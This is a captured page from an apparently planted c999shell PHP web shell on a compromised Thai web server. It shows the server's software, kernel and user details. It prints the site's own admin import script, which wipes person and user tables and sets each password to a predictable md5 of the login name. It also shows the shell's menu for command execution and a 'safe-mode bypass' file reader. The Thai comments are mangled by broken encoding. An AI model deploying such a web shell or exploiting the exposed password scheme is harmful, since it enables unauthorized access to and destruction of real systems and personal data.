Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/person/admin/ drwxr-xr-x |
Viewing file: Select action/file-type: RSperson2(); while($oPS->GetRecord()){ $oPS->Delete(); //-->> ź¢éÍÁÙÅã¹°Ò¹¢éÍÁÙÅ eotk person } $oUms2->RSumuser2(); while($oUms2->GetRecord()){ $oUms2->Delete(); //-->> ź¢éÍÁÙÅã¹°Ò¹¢éÍÁÙÅ umstk Umuser } $oUg->RSumusergroup2(); while($oUg->GetRecord()){ $oUg->Delete(); //-->> ź¢éÍÁÙÅã¹°Ò¹¢éÍÁÙÅ umstk UmUserGroup } //------------add person------------------------- $UPath='uploadfile/'.$filename; $fp = fopen($UPath, "r"); $p=2; while(!feof($fp)) { //echo "--------------------------------------------------------------------------------------------------------------------- "; $char = fgets($fp); list($prefixId, $name, $surname, $deptId, $loginname,$adminId,$hireId) = split('[,]', $char); $prefixId = rtrim($prefixId); $name = rtrim($name); $surname = rtrim($surname); $deptId= rtrim($deptId); $loginname=strtolower(rtrim($loginname)); $adminId = rtrim($adminId); $hireId= rtrim($hireId); if($prefixId!="" && $name!="" && $surname!="" && $deptId!="" && $loginname!="" && $adminId!="" && $hireId!=""){ //---------------------------add data to people echo "+++++people table "; $oPS->AddNew(); $oPS->personId=$p; echo "personId".$oPS->personId." "; $oPS->deptId=$deptId; echo "deptId".$oPS->deptId." "; $oPS->workGpId=""; $oPS->prefixId=$prefixId; echo "prefixId".$oPS->prefixId." "; $oPS->fName=$name; echo "fName".$oPS->fName." "; $oPS->lName=$surname; echo "lName".$oPS->lName." "; $oPS->fStatus="1"; $oPS->adminId=$adminId; $oPS->fRetire="0"; $oPS->hireId=$hireId; $oPS->Save(); $count=$p; $p++; //---------------------------add data to ums echo "+++++umuser "; $oUms->AddNew(); $oUms->UsID=$oUms->GetNextCode(); echo "UsID".$oUms->UsID." "; $oUms->UsName=$name." ".$surname; echo "UsName".$oUms->UsName." "; $oUms->UsLogin=$loginname; echo "UsLogin".$oUms->UsLogin." "; $oUms->UsPassword=md5("O]O".strtolower(rtrim($loginname))."O[O"); $oUms->UsPsCode=$count; echo "UsPsCode".$oUms->UsPsCode." "; //echo "personId".$oPe->personId." "; $oUms->UsWgID=''; $oUms->UsQsID=''; $oUms->UsAnswer=''; $oUms->UsEmail=''; $oUms->UsActive=''; $oUms->UsAdmin=''; $oUms->UsDesc=''; $oUms->UsPwdExpDt=''; $oUms->UsUpdDt=''; $oUms->UsUpdUsID=''; $oUms->UsSessionID=''; $oUms->Save(); //---------------------------add data to ums echo "+++++umusergroup "; $oUg->AddNew(); $oUg->UgID=$oUg->GetNextCode(); echo "UsID".$oUg->UgID." "; $oUg->UgGpID="108"; //¼Ùéã¢é·ÑèÇ仢ͧÊÒúÃó echo "UgGpID".$oUg->UgGpID." "; $oUg->UgUsID=$oUms->UsID; echo "UgUsID".$oUg->UgUsID." "; $oUg->Save(); echo "-------------------------------- "; } //if not null } //while } echo ""; ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0056 ]-- |